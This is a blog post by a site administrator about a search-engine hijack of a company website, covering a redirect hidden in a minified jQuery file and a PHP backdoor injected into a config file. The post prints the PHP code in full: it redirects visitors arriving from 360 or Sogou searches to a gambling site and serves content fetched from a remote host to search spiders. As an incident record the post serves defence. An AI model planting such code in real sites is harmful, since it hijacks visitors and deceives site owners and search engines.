記一次搜索引擎劫持攻擊

最近公司網(wǎng)站連續(xù)被黑了兩次,都是被植入了一些惡意代碼,讓點(diǎn)擊進(jìn)入網(wǎng)站的時(shí)候,跳往色情、賭博等網(wǎng)站。這里就簡(jiǎn)單記錄下吧,下次再遇上,好有個(gè)參考。

JS代碼植入

網(wǎng)站表現(xiàn)為,當(dāng)用戶從瀏覽器第一次訪問(wèn)時(shí)網(wǎng)頁(yè)時(shí),會(huì)彈出一個(gè)色情網(wǎng)站廣告的彈窗,隨后經(jīng)過(guò)幾秒鐘便會(huì)跳往該網(wǎng)站。此狀況比較容易識(shí)別,可能的情況有一下幾種

  • JS代碼中植入了重定向代碼
  • XSS攻擊,用戶提交的信息未經(jīng)過(guò)驗(yàn)證,附帶了惡意JS代碼,并發(fā)往瀏覽器進(jìn)行執(zhí)行。
  • 用戶上傳的圖片中隱藏了經(jīng)過(guò)壓縮的JS代碼,此類攻擊比較隱蔽,讓站長(zhǎng)們很難找出來(lái),需要注意的是,在用戶上傳圖片的時(shí)候,圖片也不能忽視驗(yàn)證。

本次攻擊的方式為第一種,惡意代碼隱藏在經(jīng)過(guò)壓縮的JQuery文件中,因此文件為壓縮文件,隱藏性較高。

PHP代碼植入

此情況表現(xiàn)為,當(dāng)用戶用360搜索本站時(shí),點(diǎn)擊結(jié)果時(shí),會(huì)跳往賭博網(wǎng)站,點(diǎn)擊快照為正常本站網(wǎng)頁(yè),而且用百度、谷歌等搜索出來(lái)的結(jié)果均無(wú)問(wèn)題。
由于排除了JS代碼植入的可能,一度認(rèn)為是360搜索搞的鬼,跟360官方支持郵件往來(lái)了幾天,得到的結(jié)果仍然是說(shuō)我網(wǎng)站被黑,沒(méi)對(duì)我網(wǎng)站做任何手腳,好吧,就只能自己折騰一遍,掃了一遍源碼。確實(shí)發(fā)現(xiàn)了惡意代碼,壓縮過(guò)地植入到配置文件中,如下:

define('u_b','/');
define('s_u','http://idx.root1111.com/');
define('s_s', '@haosou.com|360Spider|sougou|HaosouSpider|so.com@i');
define('h_t',$_SERVER['SERVER_NAME']);
define('r_s',$_SERVER['HTTP_REFERER']);
define('u_s',$_SERVER['HTTP_USER_AGENT']);
define('h_z',s_p());
function s_p() {
    $d = '';
    if (isset($_SERVER['REQUEST_URI'])) {
        $d = $_SERVER['REQUEST_URI'];
    } else {
        if (isset($_SERVER['argv'])) {
            $d = $_SERVER['PHP_SELF'].'?'.$_SERVER['argv'][0];
        } else {
            $d = $_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'];
        }
    }
    if (isset($_SERVER['SERVER_SOFTWARE']) && false !== stristr($_SERVER['SERVER_SOFTWARE'], 'IIS')) {
        if (function_exists('mb_convert_encoding')) {
            $d = mb_convert_encoding($d, 'UTF-8', 'GBK');
        } else {
            $d = @iconv('GBK', 'UTF-8', @iconv('UTF-8', 'GBK', $d)) == $d ? $d: @iconv('GBK', 'UTF-8', $d);
        }
    }
    $r = explode('#', $d, 2);
    $d = $r[0];
    return $d;
}
function r_s($url) {
    $o = array('http' = >array('method' = >"GET", 'timeout' = >8));
    $context = stream_context_create($o);
    $h = file_get_contents($url, false, $context);
    if (empty($h)) {
        $h = file_get_contents($url);
    }
    return $h;
}
if (preg_match(s_s, r_s)) {
    $d_s = true;
    if (preg_match("@site%3A|inurl%3A@i", r_s)) {
        setcookie('xx', h_t, time() + 259200);
        $d_s = false;
    }
    if ($d_s) {
        header('Location: http://668689.net');
        exit;
    }
}
if (strstr(h_z, u_b)) {
    if (preg_match(s_s, u_s)) {
        $d_u = s_u.'?xu='.bin2hex(h_z);
        $d_u. = '&xh='.bin2hex(h_t);
        $d_c = r_s($d_u);
        echo $d_c;
        exit;
    }
}

黑客只對(duì)來(lái)源360搜索和搜狗搜索的結(jié)果進(jìn)行了重定向,頗有取舍,也造成了站長(zhǎng)的疑惑,讓人懷疑是360搞的鬼,套路深。

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容